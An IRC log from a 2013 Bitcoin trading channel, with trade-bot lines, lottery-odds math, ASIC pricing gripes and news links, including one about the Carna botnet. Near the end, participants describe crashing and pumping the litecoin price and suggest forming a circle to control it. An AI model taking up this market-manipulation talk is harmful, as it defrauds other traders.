[-] Mar 20 09:45:31 Namworld: no, I said I probably got the magnitude wrong Mar 20 09:51:13 derp Mar 20 09:51:49 *yawn Mar 20 09:51:53 to $100 Mar 20 09:52:13 Namworld: okay what about each satoshi is a 1 in 15 quaturovigintillion change? Mar 20 09:52:37 er chance Mar 20 09:52:54 thats 2^256 Mar 20 09:53:28 2^128 is 340 undecillion Mar 20 09:53:41 That can’t work... Mar 20 09:53:48 or I’m missing something Mar 20 09:54:03 Namworld: an extremely low chance. Mar 20 09:54:20 2^64 is 18 quintillion Mar 20 09:54:40 like with those odds, one would bet 21 million BTC and have lower odds to win than winning the state lottery 5 times in a row. Mar 20 09:54:49 and theres 8 places in 1 BTC Mar 20 09:54:55 so move 18 over 8 places Mar 20 09:55:45 so 1 BTC would be 180 billion chance Mar 20 09:55:48 no wait I did that wrong Mar 20 09:55:50 1.8 trillion Mar 20 09:57:51 You could bet all freaking 21 BTC and have as good as null chances to win the jackpot... Mar 20 09:57:57 21 million BTC* Mar 20 09:59:30 Namworld: no different than powerball really Mar 20 10:00:10 powerball would have like close to infinite higher chances to win Mar 20 10:01:47 184,467,440,737 per btc Mar 20 10:01:49 so 184 billion Mar 20 10:02:05 uh? Mar 20 10:02:27 2**64 / 100000000 Mar 20 10:03:27 ok, so 1/2**64 per satoshi Mar 20 10:03:56 yes Mar 20 10:04:03 ;;calc 2**64/21000000*100000000 Mar 20 10:04:04 87841638446235959296 Mar 20 10:04:29 erhm Mar 20 10:04:32 I dont think you wrote what you thought you wrote Mar 20 10:04:33 ;;calc 2**64/(21000000*100000000) Mar 20 10:04:34 8784.16384462 Mar 20 10:05:03 powerball jackpot is 1 in 175 million Mar 20 10:05:25 I bet 1 BTC (58 USD) for one ticket. Mar 20 10:05:56 Namworld: you bet 1 BTC for 100000000 tickets, actually Mar 20 10:06:01 whos been buying btc? Mar 20 10:06:03 I could get 21 million x 58 USD ticket and have a 1/8784 odds of winning a maximum of... 21 million BTC. Mar 20 10:06:24 Namworld: well Mar 20 10:06:35 184 billion is if I set the difficulty as high as possible Mar 20 10:06:56 i184 billion per btc is if the difficulty is less than 1 Mar 20 10:07:06 if I set it to less than 1000 ,its 184 million Mar 20 10:07:22 topace_ https://bitcointalk.org/index.php?topic=155238.0 Mar 20 10:07:29 yeah, but that’s like zero incentive for first people to put anything. Mar 20 10:07:38 The odds are way too low. Mar 20 10:07:59 [04:05:05] powerball jackpot is 1 in 175 million Mar 20 10:08:20 They’re like infinitely lower on what you propose... Mar 20 10:09:06 ;;calc 21000000*8784 Mar 20 10:09:07 184464000000 Mar 20 10:09:30 1/184 billion if I bet a whole BTC Mar 20 10:09:46 yes, I already said that Mar 20 10:09:53 [04:06:38] 184 billion is if I set the difficulty as high as possible Mar 20 10:09:53 [04:06:59] i184 billion per btc is if the difficulty is less than 1 Mar 20 10:09:53 [04:07:08] if I set it to less than 1000 ,its 184 million Mar 20 10:09:59 [HAVELOCK] [HIM] 11 @ 1.999 = 21.989 BTC [+] Mar 20 10:10:10 Odds too low unless difficulty go down. Not interesting for anyone to bet. Mar 20 10:10:57 Especially since the jackpot is small too Mar 20 10:11:21 The two combines and urgh... Mar 20 10:14:04 [BTCTC] [GSDPT] 10 @ 0.00425 = 0.0425 BTC [+] Mar 20 10:14:33 [BTCTC] [GSDPT] 160 @ 0.004231 = 0.677 BTC [-] Mar 20 10:14:37 fine, have the difficulty go up as the pot goes up Mar 20 10:14:59 Wouldn’t be a bad idea like that. Would make more sense. Mar 20 10:15:08 [BTCTC] [GSDPT] 20 @ 0.004217 = 0.0843 BTC [-] Mar 20 10:15:19 if i accidently deleat a file on linux, how do i get it back? Mar 20 10:15:26 But difficulty should probably cap as to avoid ever lowering odds and never reaching jackpot. Mar 20 10:16:06 Namworld: yeah, cap is one in 1000 Mar 20 10:17:51 Chaang: if you did that, it will be challenging to undelete them. first thing you need to do is shutting system down to prevent further write accesses Mar 20 10:18:29 Anyway, getting late. I’ll be off. Mar 20 10:18:46 But it does seem better with difficulty increase with pot somewhat. Mar 20 10:19:05 [MPEX] [S.MPOE] 3701 @ 0.00070542 = 2.6108 BTC [-] Mar 20 10:19:08 [MPEX] [S.MPOE] 2599 @ 0.00070356 = 1.8286 BTC [-] Mar 20 10:19:23 difficulty increases with pot, but it seems easier Mar 20 10:19:29 :) Mar 20 10:19:41 well Mar 20 10:20:20 I wonder if theres a block chain info site that can give me a total list of all money sent to an address Mar 20 10:21:27 are you being sarcastic Mar 20 10:21:35 you'll never guess the name Mar 20 10:22:08 blockchain.info Mar 20 10:22:12 pigeons: no, I dont mean blockchain.info Mar 20 10:22:15 it doesnt seem to do it Mar 20 10:22:20 i just tested Mar 20 10:22:36 "Total Received" Mar 20 10:22:46 orly it can? HRM Mar 20 10:23:45 blockchain.info doesn't have a json api does it Mar 20 10:23:58 [HAVELOCK] [SDICE] 2 @ 0.42 = 0.84 BTC [+] Mar 20 10:24:00 [HAVELOCK] [SDICE] 11 @ 0.415 = 4.565 BTC [-] Mar 20 10:24:01 [HAVELOCK] [SDICE] 2 @ 0.412 = 0.824 BTC [-] Mar 20 10:24:02 [HAVELOCK] [SDICE] 4 @ 0.411 = 1.644 BTC [-] Mar 20 10:24:03 [HAVELOCK] [SDICE] 1 @ 0.41020001 BTC [-] Mar 20 10:24:04 [HAVELOCK] [SDICE] 12 @ 0.4102 = 4.9224 BTC [-] Mar 20 10:24:07 http://blockchain.info/api/blockchain_api Mar 20 10:24:58 [HAVELOCK] [HIM] 6 @ 1.999 = 11.994 BTC [+] Mar 20 10:25:28 oh lol Mar 20 10:25:41 d3, welsome to bitcoin and the internet :) Mar 20 10:26:04 bbl guys, Mar 20 10:26:57 pigeons: that should be easy to setup with js then Mar 20 10:38:44 [BTCTC] [B.YABMC] 1 @ 0.01451 BTC [+] Mar 20 10:39:52 [BTCTC] [B.YABMC] 1 @ 0.01 BTC [-] Mar 20 10:47:00 [MPEX] [S.MPOE] 8001 @ 0.00070739 = 5.6598 BTC [+] Mar 20 10:51:36 so banks/tv/etc in south korea offline due to cyber attack Mar 20 10:53:09 so ronery Mar 20 10:54:20 lol Mar 20 10:54:59 "Re: New BTC Found" Mar 20 10:55:16 person can't spell fund, is big time mover and shaker with experience and etc. Mar 20 10:57:14 "If anyone is interested in buying securities that copy the MPEx dividend payouts but do not involve any dealings with the actual MPEx shares (such as share loans, etc.), PM me. About 1 million will be issued if there is demand. If issued, the securities will be backed by an incorporated company with EUR 200,000 total assets, of which 1500 BTC." Mar 20 10:57:16 another one Mar 20 10:57:21 god help us. Mar 20 11:37:06 [BTCTC] [COGNITIVE] 1 @ 0.24994 BTC [+] Mar 20 11:40:35 [BTCTC] [GSDPT] 2 @ 0.00479 = 0.0096 BTC [+] Mar 20 11:41:00 [BTCTC] [SYNERGY] 1 @ 0.0168 BTC [+] Mar 20 11:42:29 [MPEX] [S.DICE] 624 @ 0.00381798 = 2.3824 BTC [-] Mar 20 11:44:09 mpex bucket shop Mar 20 11:45:07 http://media.riemurasia.net/albumit/m34359/1123191333.gif Mar 20 11:46:36 "No, it is not. It is just the thing that we offer people to bet for. And I would be delighted to know what exactly makes us any more vulnerable to angry gov that MPEx and SD are." Mar 20 11:46:41 this guy is actually pretty amusing. Mar 20 11:46:49 an usagi challenger appears. Mar 20 11:47:50 [MPEX] [S.MPOE] 7704 @ 0.00072562 = 5.5902 BTC [+] Mar 20 12:05:59 [BTCTC] [SYNERGY] 1 @ 0.0168 BTC [+] Mar 20 12:06:00 X.IDIFF.MAR settled. Mar 20 12:06:07 symbol now trades for 2014 delivery. Mar 20 12:12:28 [MPEX] [S.MPOE] 1857 @ 0.00072143 = 1.3397 BTC [-] Mar 20 12:24:25 [MPEX] [S.MPOE] 2214 @ 0.00072562 = 1.6065 BTC [+] Mar 20 12:24:27 [MPEX] [S.MPOE] 8900 @ 0.0007314 = 6.5095 BTC [+] Mar 20 12:25:31 [BTCTC] [ASICMINER-PT] 1 @ 0.8559 BTC [+] Mar 20 12:25:33 [BTCTC] [ASICMINER-PT] 15 @ 0.856 = 12.84 BTC [+] Mar 20 12:26:31 [BTCTC] [ASICMINER-PT] 1 @ 0.8569 BTC [+] Mar 20 12:26:34 [BTCTC] [ASICMINER-PT] 6 @ 0.857 = 5.142 BTC [+] Mar 20 12:29:10 http://www.activistpost.com/2013/03/cyprus-bank-raid-bitcoins.html Mar 20 12:33:24 http://www.usatoday.com/story/news/world/2013/03/20/south-korean-computer-crash/2001873/ Mar 20 12:35:11 yeah Mar 20 12:35:55 revenge for gangam style Mar 20 12:38:39 lol Mar 20 12:38:44 if only that were true Mar 20 12:56:50 hi Mar 20 12:56:57 anyone up? Mar 20 12:57:05 no. Mar 20 12:57:08 lol Mar 20 12:57:40 mircea_popescu: I'm so glad that trilema is back up...lots of good articles Mar 20 12:58:06 mjr_ :) Mar 20 12:58:39 i can't do the bitcointalk forum Mar 20 13:00:48 mircea_popescu: how do i get credits? Mar 20 13:01:12 really want to read the stego article Mar 20 13:01:32 i have been sending my friends pictures of cats with encrypted messages in them Mar 20 13:01:44 lol Mar 20 13:04:41 ;;ticker Mar 20 13:04:42 BTCUSD ticker | Best bid: 59.11710, Best ask: 59.25000, Bid-ask spread: 0.13290, Last trade: 59.11710, 24 hour volume: 106528.71037829, 24 hour low: 53.00000, 24 hour high: 62.00000, 24 hour vwap: 57.47445 Mar 20 13:09:25 is there anyone working on a chrome plugin that could be used to pay bitcoins to websites? Mar 20 13:09:48 mjr_: you wouldnt need that actually Mar 20 13:09:58 you could do it with a bitcoin:// url Mar 20 13:13:50 "Actually, if you don’t know anything about talking to computers my best advice to you is “marry someone who does”. Definitely." worth the price of admission Mar 20 13:14:23 Diablo-D3: if you have a client installed i guess? Mar 20 13:14:32 i was just thinking of mircea's model Mar 20 13:14:52 if you could automate that process...make it a click that a plugin handles behind the scenes Mar 20 13:15:36 like you would "fund" your browser...and then you would browse away to your hearts content, offering up micropayments for content that you want Mar 20 13:16:43 the problem with a browser is you'd need to have it running all the time Mar 20 13:16:52 i don't think so... Mar 20 13:17:03 it would simply be an address that is monitored Mar 20 13:17:08 similar to blockchain.info Mar 20 13:22:06 pigeons did you share that book with an interested party ? Mar 20 13:25:23 yes i did Mar 20 13:26:14 which shouldn't violate my agreement not to post it publically, bu i dont know Mar 20 13:27:36 hang on im ordering my gilded popcorn Mar 20 13:29:04 waiting for his post Mar 20 13:29:49 oh i see it Mar 20 13:31:31 yeah i doubt he'll give me any more copies Mar 20 13:31:41 awww Mar 20 13:32:36 surely he expected that Mar 20 13:32:37 :) Mar 20 13:36:39 [MPEX] [S.DICE] 11850 @ 0.004 = 47.4 BTC [+] Mar 20 13:57:58 [MPEX] [S.DICE] 400 @ 0.004 = 1.6 BTC [+] Mar 20 13:58:16 seems low? Mar 20 13:58:41 !ticker m s.dice Mar 20 13:58:42 [MPEX:S.DICE] 1D: 0.00381798 / 0.00427895 / 0.005 (75762 shares, 324.18 BTC), 7D: 0.00381798 / 0.00469793 / 0.00599987 (147519 shares, 693.04 BTC), 30D: 0.00300001 / 0.00603657 / 0.0069 (2351124 shares, 14,192.73 BTC) Mar 20 13:58:47 yup came down a fair bit. Mar 20 14:04:49 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [+] Mar 20 14:05:43 !ticker btctc pajka.bond Mar 20 14:05:45 [BTCT:PAJKA.BOND] 1D: 0.104999 / 0.105 / 0.105 (81 shares, 8.5 BTC), 7D: 0.08001 / 0.10242 / 0.10999 (1286 shares, 131.7 BTC), 30D: 0.01552 / 0.10177 / 0.10999 (1564 shares, 159.2 BTC) Mar 20 14:08:37 [MPEX] [S.MPOE] 7650 @ 0.00074863 = 5.727 BTC [+] Mar 20 14:10:23 [MPEX] [S.DICE] 12075 @ 0.004 = 48.3 BTC [+] Mar 20 14:10:37 $depth s.dice Mar 20 14:10:38 mircea_popescu: Bids: ['1700 @ 0.00393432', '300 @ 0.0038', '1000 @ 0.00355004', '5034 @ 0.003198', '13530 @ 0.00311001'] Mar 20 14:10:39 mircea_popescu: Asks: ['93037 @ 0.004', '141 @ 0.00480598', '201 @ 0.005', '6623 @ 0.0051', '2000 @ 0.00577'] Mar 20 14:15:07 [BTCTC] [PAJKA.BOND] 10 @ 0.105 = 1.05 BTC [+] Mar 20 14:21:50 https://bitcointalk.org/index.php?topic=155283.0 wat Mar 20 14:22:12 ;;calc 400*[ticker --last] Mar 20 14:22:12 23715.932 Mar 20 14:23:29 yo Mar 20 14:23:46 [MPEX] [S.DICE] 1000 @ 0.004 = 4 BTC [+] Mar 20 14:23:46 yo! Mar 20 14:24:14 https://bitcointalk.org/index.php?topic=153742.msg1646636#msg1646636 bombshell lol Mar 20 14:25:28 ;;ticker Mar 20 14:25:28 BTCUSD ticker | Best bid: 59.30000, Best ask: 59.49998, Bid-ask spread: 0.19998, Last trade: 59.29983, 24 hour volume: 104385.36260976, 24 hour low: 53.00000, 24 hour high: 62.00000, 24 hour vwap: 57.59737 Mar 20 14:30:09 ;;bc,stats Mar 20 14:30:11 Current Blocks: 226924 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 883 blocks | Next Difficulty In About: 4 days, 19 hours, 10 minutes, and 26 seconds | Next Difficulty Estimate: 6187365.50681 | Estimated Percent Change: 27.63647 Mar 20 14:32:01 ;;ticker Mar 20 14:32:02 BTCUSD ticker | Best bid: 59.20002, Best ask: 59.30983, Bid-ask spread: 0.10981, Last trade: 59.30983, 24 hour volume: 104205.20199766, 24 hour low: 53.00000, 24 hour high: 62.00000, 24 hour vwap: 57.60493 Mar 20 14:32:35 ;;calc (57.60493-41)/57.60493 Mar 20 14:32:35 0.288255362866 Mar 20 14:59:41 ;;bc,stats Mar 20 14:59:43 Current Blocks: 226929 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 878 blocks | Next Difficulty In About: 4 days, 18 hours, 31 minutes, and 18 seconds | Next Difficulty Estimate: 6197165.1884 | Estimated Percent Change: 27.83862 Mar 20 15:05:57 so Mar 20 15:06:05 this guy is "gonna eat MPEX for lunch" https://bitcointalk.org/index.php?topic=153742.0 Mar 20 15:06:24 too big for breakfast? Mar 20 15:07:45 is this a new one ? Mar 20 15:11:18 dunno Mar 20 15:11:27 but he has a tie. Mar 20 15:11:44 a ok then Mar 20 15:13:33 [MPEX] [S.DICE] 100 @ 0.004 = 0.4 BTC [+] Mar 20 15:16:04 lol binary options Mar 20 15:16:17 otherwise known as the slot machines of finance Mar 20 15:16:59 :) Mar 20 15:17:47 kinda scary how many peppy nuts are circling btc since > 50 Mar 20 15:17:53 i shudder to think what will happen when 1000 Mar 20 15:19:21 [MPEX] [S.MPOE] 394 @ 0.00074863 = 0.295 BTC [+] Mar 20 15:21:43 peppy nuts? Mar 20 15:22:02 from pep. Mar 20 15:22:06 overactive. Mar 20 15:22:23 oh? iv not seen to much of that Mar 20 15:22:30 some celibrtation sure Mar 20 15:22:34 [MPEX] [S.DICE] 8 @ 0.004 = 0.032 BTC [+] Mar 20 15:23:23 celibrex maybe Mar 20 15:24:18 https://bitcointalk.org/index.php?topic=155054.0 Mar 20 15:24:20 this is pretty good Mar 20 15:24:30 https://bitcointalk.org/index.php?topic=153979.msg1647110#msg1647110 Mar 20 15:24:32 facepalm Mar 20 15:25:28 i seriously consider offering my expertise to that finnish man.. and promptly outsource it to dunnowhere Mar 20 15:29:08 meow Mar 20 15:29:47 you mean the estonian ? Mar 20 15:33:29 kakobrekla wait, so he wants to eat mpex for lunch by competing with bitbet ?! Mar 20 15:33:37 wtf is all this nonsense! Mar 20 15:33:50 i thought it was sdice first Mar 20 15:33:56 "- Of course the above would be moot if the spread was sky-high. We intend to push it as low as possible, and give you the best of both worlds - the liquidity of a market-maker but also the low spreads possible in a parimutuel or similar approach." Mar 20 15:34:08 right. we're going to do anything and we have no plan whatsoever. Mar 20 15:34:09 dunno Mar 20 15:34:11 sigh. Mar 20 15:34:31 Avalon will now cost 88 BTC to 115 BTC Mar 20 15:34:42 capitalizing on BFL's incompetence, same specs Mar 20 15:34:57 what? Mar 20 15:35:21 where did you pick that up Mar 20 15:35:43 https://bitcointalk.org/index.php?topic=155345.0 Mar 20 15:36:13 there goes my fourth module Mar 20 15:36:23 they are fucked in the head Mar 20 15:36:23 i wish I picked up 3 lol Mar 20 15:37:17 in other news, sonny and josh are preparing to ship themselves out of town, apparently Mar 20 15:37:18 https://blockchain.info/tx/eb1a3f97ac4579eb4edec99315fb44c9219bdbf7bc180abc5e09590ec93a2b71 Mar 20 15:37:19 , The price will be obviously much higher than previous, based on the reasonable ROI. The price is 88 BTC to 115 BTC(31680 RMB to 41400 RMB) depending on configurations, freight charge not included. Mar 20 15:37:25 i dion't get this part Mar 20 15:37:28 obviously why ? Mar 20 15:37:37 obviously china Mar 20 15:37:46 thye are pegging the price to yuan Mar 20 15:37:49 instead of dollar Mar 20 15:37:55 so 360 yuan = 1 btc Mar 20 15:38:04 making the price around 5 grand, over Mar 20 15:38:09 get to the obvious part tho Mar 20 15:38:31 they are stabbing themselfs in the face Mar 20 15:38:32 obvious that people will pay that much Mar 20 15:38:44 they have monopoly on asics, go figure Mar 20 15:38:46 bfl wont ship Mar 20 15:38:47 ect Mar 20 15:38:53 this is not how you get a monopoly. Mar 20 15:38:56 bah. Mar 20 15:39:04 everyone is either a scammer, stupid, or a stupid scammer. Mar 20 15:39:10 hwo the fuck are we going to get anywhere :( Mar 20 15:39:15 well, its apparent people will still pay for this.. Mar 20 15:39:17 they are mining with every machine for a while before they even ship it Mar 20 15:39:27 sigh. Mar 20 15:39:28 they are raking in btc, they can do what they want i guess Mar 20 15:39:42 its just asicminer vs avalon Mar 20 15:39:45 until someone comes along Mar 20 15:39:48 [MPEX] [S.MPOE] 3300 @ 0.00075613 = 2.4952 BTC [+] Mar 20 15:40:11 asicminer hashing is supposed to skyrocket in the next few weeks right? Mar 20 15:42:14 well Mar 20 15:42:19 avalon can go fuck themselfs Mar 20 15:43:14 agreed Mar 20 15:44:00 i've never seen so much greed so quickly in such a young industry Mar 20 15:44:09 this shit might burn out in 5 years Mar 20 15:44:59 well, if they really are greedy, they wouldn't have shipped asics to the public Mar 20 15:45:31 [MPEX] [S.DICE] 207 @ 0.004 = 0.828 BTC [+] Mar 20 15:46:02 of course, there goes my plan for 5 more ASICS Mar 20 15:46:37 boxes should be getting cheaper not expenciver Mar 20 15:46:44 "Only a small amount of units will be shipped during late March to early April" Mar 20 15:46:46 its the other way around ngz. Mar 20 15:46:52 what a retard. Mar 20 15:47:17 heh. Mar 20 15:47:23 bitcoin needs an asic maker. Mar 20 15:47:31 CoinBr.iDiff-O May will open soon, what collateral (max.feasible difficulty) are you seeing by May 22? Mar 20 15:47:33 why the hell doesnt AMD do it Mar 20 15:47:52 they are selling ass tons of GPUs to the sector Mar 20 15:47:58 even still for litecoin Mar 20 15:48:12 why not make some consumer cards for mining Mar 20 15:48:27 litecoin is unusually stable lately Mar 20 15:48:29 50 cents Mar 20 15:48:29 cause all the bitcoin ppl is an insignificat fraction Mar 20 15:48:30 damn Mar 20 15:48:31 of their biz Mar 20 15:48:41 AMD has year or so turnaround Mar 20 15:48:59 and few people has heard of btc Mar 20 15:49:07 we are actually the early adopters Mar 20 15:49:09 kako, how much $ do you think has been spent and will be spent on ASICS this year Mar 20 15:49:21 not enought o make AMD some money? Mar 20 15:49:26 nope Mar 20 15:49:33 [MPEX] [S.MPOE] 250 @ 0.00075613 = 0.189 BTC [+] Mar 20 15:50:21 those avalon asics.. they are compatible with NA sockets right Mar 20 15:50:28 i wont need some chinese transformer Mar 20 15:51:22 NA? Mar 20 15:51:33 north america Mar 20 15:51:35 us and canada Mar 20 15:51:40 prolly Mar 20 15:51:55 psu should be auto switching Mar 20 15:52:06 wtf, they don't have detachable cord? Mar 20 15:52:24 yepp standard kettle lead Mar 20 15:55:52 http://www.theregister.co.uk/2013/03/19/carna_botnet_ipv4_internet_map/ seems 420000 node botnet isn't so hard to build after all Mar 20 15:57:20 mircea_popescu ^^^ Mar 20 15:58:54 guess that's ripe for worldwide ban to sell any hardware with preconfigured default password Mar 20 15:59:42 ffs Mar 20 16:02:33 why do girls do this Mar 20 16:02:34 http://i.imgur.com/msly2x0.jpg?1 Mar 20 16:02:57 attention Mar 20 16:03:27 tell her she's not ugly Mar 20 16:03:31 thats what she wants Mar 20 16:03:36 I told her, looks don;t matter Mar 20 16:03:36 no Mar 20 16:03:45 tell her she's okey looking Mar 20 16:03:46 heh, that must hurt Mar 20 16:03:53 but looks aren't the most important Mar 20 16:03:58 "It's okay, looks aren't everything." Mar 20 16:04:00 xD Mar 20 16:04:07 tell her its hard to tell with all those clothes on Mar 20 16:04:09 she'll be begging for your approval Mar 20 16:04:37 nicely played bow Mar 20 16:05:02 of course. that was the perfect answer. Mar 20 16:05:14 yep Mar 20 16:05:26 so is coinlab move complete ? Mar 20 16:05:43 yes operation destroy bitcoin is in play Mar 20 16:06:13 "'m hugely excited to announce to you that CoinLab will be teaming up with Mt. Gox and Silicon Valley Bank to provide Bitcoin purchase, sale and exchange services to customers in the U.S and Canada as of March 31, 2013." Mar 20 16:06:27 he has a big boner over this Mar 20 16:06:33 they were the only ones Mar 20 16:06:45 wasn't it a lie? Their press release Mar 20 16:07:00 a lie? Mar 20 16:07:02 isn't gox being pressured into this deal with coinlab? Mar 20 16:07:12 gox confirmed i think Mar 20 16:07:33 sorry i mean the whole wallstreet fluff Mar 20 16:10:35 you lost me Mar 20 16:10:47 coinlab is taking over all of gox's US customers Mar 20 16:10:55 https://bitcointalk.org/index.php?topic=154722.0 this has all sorts of epic in it Mar 20 16:10:57 gox confirmed this in a short press release Mar 20 16:10:57 pigeons ^ Mar 20 16:11:13 "Ok, people would take you more seriously if you meant what you said, just so you know. The offer is real though. Peace" -dank Mar 20 16:11:23 I told dank I would give him 3 BTC for a motorcycle Mar 20 16:11:35 he sends me an address, I told him, I already got one for 2 BTC. Mar 20 16:11:54 a $120 motorcycle? Mar 20 16:11:57 nice ride Mar 20 16:12:58 yeap Mar 20 16:14:21 He's selling music festival passes now Mar 20 16:14:21 https://bitcointalk.org/index.php?topic=155359.msg1647154#msg1647154 Mar 20 16:14:26 get yours today! Mar 20 16:19:52 ;;bc,stats Mar 20 16:19:54 Current Blocks: 226941 | Current Difficulty: 4847647.152065606 | Next Difficulty At Block: 227807 | Next Difficulty In: 866 blocks | Next Difficulty In About: 4 days, 17 hours, 34 minutes, and 25 seconds | Next Difficulty Estimate: 6205279.45368 | Estimated Percent Change: 28.006 Mar 20 16:20:01 uh oh Mar 20 16:21:40 so i'll reap profit both from iDiff-O and from its bitbet hedge? lmao Mar 20 16:29:47 maybe avalon is pricing high because they want less work for the same money Mar 20 16:29:54 pruning clients Mar 20 16:29:57 [HAVELOCK] [SDICE] 4 @ 0.4103 = 1.6412 BTC [+] Mar 20 16:29:58 [HAVELOCK] [SDICE] 1 @ 0.4102 BTC [-] Mar 20 16:29:59 [HAVELOCK] [SDICE] 1 @ 0.4102 BTC [-] Mar 20 16:30:01 [HAVELOCK] [SDICE] 10 @ 0.41000001 = 4.1 BTC [-] Mar 20 16:30:01 [HAVELOCK] [SDICE] 4 @ 0.41 = 1.64 BTC [-] Mar 20 16:31:05 [MPEX] [S.DICE] 48796 @ 0.004 = 195.184 BTC [+] Mar 20 16:33:14 i assume a 4th module will cost 22 BTC? Mar 20 16:33:33 $1300+ for a module that hashes 22 gh Mar 20 16:33:36 yikes Mar 20 16:34:57 avalon sells by USD not BTC Mar 20 16:35:03 so they probably havent adjusted their pricing yet Mar 20 16:35:10 the three module avalons were selling for $1300 Mar 20 16:35:31 wrong Mar 20 16:35:34 by yuan Mar 20 16:35:39 not pegged to usd Mar 20 16:35:42 anymore Mar 20 16:35:49 same difference Mar 20 16:35:56 no Mar 20 16:36:44 the yuan is not massively deflating Mar 20 16:36:47 so yes, its the same thing Mar 20 16:37:48 https://bitcointalk.org/index.php?topic=155345.0 Mar 20 16:38:28 well its by btc now actually Mar 20 16:38:29 lol Mar 20 16:39:57 [BTCTC] [BASIC-MINING] 4 @ 0.33318 = 1.3327 BTC [-] Mar 20 16:40:37 btw, finally got a bet approved: http://bitbet.us/bet/314/bitcointalk-org-treasurer-to-be-scammer-tagged/?ref=1EteoRKNYbNhhmFfsKnUSWRF3JUpKCcMnc Mar 20 16:42:48 getting scammer tag isnt necessarily result of a crime Mar 20 16:43:10 scamming isn't a crime? Mar 20 16:43:26 getting the tag isn't Mar 20 16:43:55 http://s23.postimage.org/rr8hyldu3/avalon.jpg Mar 20 16:43:58 if it was "treasurer to be convicted" that would be another matter Mar 20 16:43:59 yeah, seems easy to throw it Mar 20 16:49:33 [MPEX] [S.DICE] 900 @ 0.004 = 3.6 BTC [+] Mar 20 16:49:45 [MPEX] [S.DICE] 1250 @ 0.004 = 5 BTC [+] Mar 20 16:49:48 [MPEX] [S.DICE] 800 @ 0.004 = 3.2 BTC [+] Mar 20 16:51:42 dice Mar 20 16:51:44 what are u doin Mar 20 16:51:46 stahp Mar 20 16:52:12 [MPEX] [S.DICE] 395 @ 0.004 = 1.58 BTC [+] Mar 20 16:53:56 [MPEX] [S.DICE] 300 @ 0.004 = 1.2 BTC [+] Mar 20 16:54:06 [MPEX] [S.DICE] 19000 @ 0.004 = 76 BTC [+] Mar 20 16:59:59 im not sure avalon will sell 600 units at 100 btc Mar 20 17:00:16 kinda doubt it Mar 20 17:00:20 mebbe time for a bet Mar 20 17:02:57 [HAVELOCK] [KCIM] 1 @ 1.011 BTC [-] Mar 20 17:03:57 kako, ahead of you Mar 20 17:03:58 lol Mar 20 17:05:27 hm Mar 20 17:05:33 your bet is will be sold out in 1 day? Mar 20 17:06:15 wooo asicminer share Mar 20 17:06:38 yap Mar 20 17:06:42 24 hrs Mar 20 17:07:03 div* Mar 20 17:07:11 should it be 3 days then? Mar 20 17:08:04 [BTCTC] [ASICMINER-PT] 1 @ 0.8568 BTC [-] Mar 20 17:08:19 [BTCTC] [ASICMINER-PT] 9 @ 0.8568 = 7.7112 BTC [-] Mar 20 17:08:48 [BTCTC] [ASICMINER-PT] 4 @ 0.857 = 3.428 BTC [+] Mar 20 17:09:40 [BTCTC] [ASICMINER-PT] 7 @ 0.858995 = 6.013 BTC [+] Mar 20 17:11:32 [MPEX] [S.MPOE] 7100 @ 0.00075263 = 5.3437 BTC [-] Mar 20 17:11:33 [MPEX] [S.MPOE] 2900 @ 0.00074912 = 2.1724 BTC [-] Mar 20 17:14:51 [MPEX] [O.BTCUSD.C610T] 10 @ 0.09682584 = 0.9683 BTC [+] Mar 20 17:28:52 [BTCTC] [ASICMINER-PT] 3 @ 0.858994 = 2.577 BTC [-] Mar 20 17:39:54 [MPEX] [S.DICE] 124 @ 0.00393432 = 0.4879 BTC [-] Mar 20 17:41:03 rally? Mar 20 17:41:09 fuck yeah Mar 20 17:41:34 keep it going Mar 20 17:41:36 ;;ticker Mar 20 17:41:36 BTCUSD ticker | Best bid: 59.80000, Best ask: 59.80560, Bid-ask spread: 0.00560, Last trade: 59.80000, 24 hour volume: 71444.29658211, 24 hour low: 53.00000, 24 hour high: 60.88800, 24 hour vwap: 57.89681 Mar 20 17:41:43 what rally Mar 20 17:41:54 we are at 61.97 Mar 20 17:41:59 62 Mar 20 17:42:10 new ATH Mar 20 17:42:11 ;;goxlag Mar 20 17:42:11 104.355169 seconds Mar 20 17:42:12 fuck yeah Mar 20 17:42:21 62.57 Mar 20 17:42:24 oh fuck Mar 20 17:42:33 63 Mar 20 17:42:39 dead 63 Mar 20 17:42:47 63.4 Mar 20 17:42:55 63.7 Mar 20 17:42:56 holy shit Mar 20 17:43:16 yeah Mar 20 17:43:28 haha, look at the lag Mar 20 17:43:30 ;;goxlag Mar 20 17:43:31 45.834547 seconds Mar 20 17:43:36 oh went way down Mar 20 17:43:42 63.78 Mar 20 17:43:59 dows cuz no debth Mar 20 17:44:32 this makes the avalol delay a bit more bearable Mar 20 17:44:47 yeah, esp cuz i hold asicminer stock Mar 20 17:45:24 ltc asicminer, btc Mar 20 17:45:32 you're on a roll Mar 20 17:46:16 back to 61 Mar 20 17:47:07 [BTCTC] [ASICMINER-PT] 8 @ 0.858993 = 6.8719 BTC [-] Mar 20 17:47:26 Chaang, do you work the ups and downs at BTC-e for litecoin? Mar 20 17:47:28 i hold btc, ltc and asicminer, and yeah im on fucking fire this months Mar 20 17:47:47 careful you dont burn out Mar 20 17:47:47 i used to, i got over 200k ltc for free that way Mar 20 17:47:56 but i quit after we broke 20 cents Mar 20 17:48:17 i sold 80k or so over .01 and if i get to buy back in i will Mar 20 17:48:24 but im looking for .008ish or less Mar 20 17:49:29 you can crash it yousel.. ltc holders are lemminhs Mar 20 17:49:32 lemmings Mar 20 17:49:35 yay, i'm back :) Mar 20 17:49:37 you can buy buck cheaper Mar 20 17:49:50 i sold 50k at .01 trying to stop it Mar 20 17:50:00 then i did crash it to .01 but it has not gone down much Mar 20 17:50:20 its very steady at 50c ea Mar 20 17:50:21 i played with crashing and pumping some this week Mar 20 17:50:35 you need like 200k just to move it and keep it Mar 20 17:50:39 overall money can be made if you arent too aggresive Mar 20 17:50:44 [MPEX] [O.BTCUSD.C410T] 8 @ 0.29453842 = 2.3563 BTC [+] Mar 20 17:50:56 yeah i just thought id better quit for now Mar 20 17:50:56 we shold start a circle of market movers Mar 20 17:51:04 and just control it Mar 20 17:51:15 lol Mar 20 17:51:16 i know some big holders but... im not sure that is good for ltc over all Mar 20 17:51:27 i wish i didnt dump 10k ltc Mar 20 17:51:27 good if we dont dump Mar 20 17:51:29 oh well Mar 20 17:51:46 i have a bit more to dump, im holding 84000 for a long time Mar 20 17:51:46 hmm 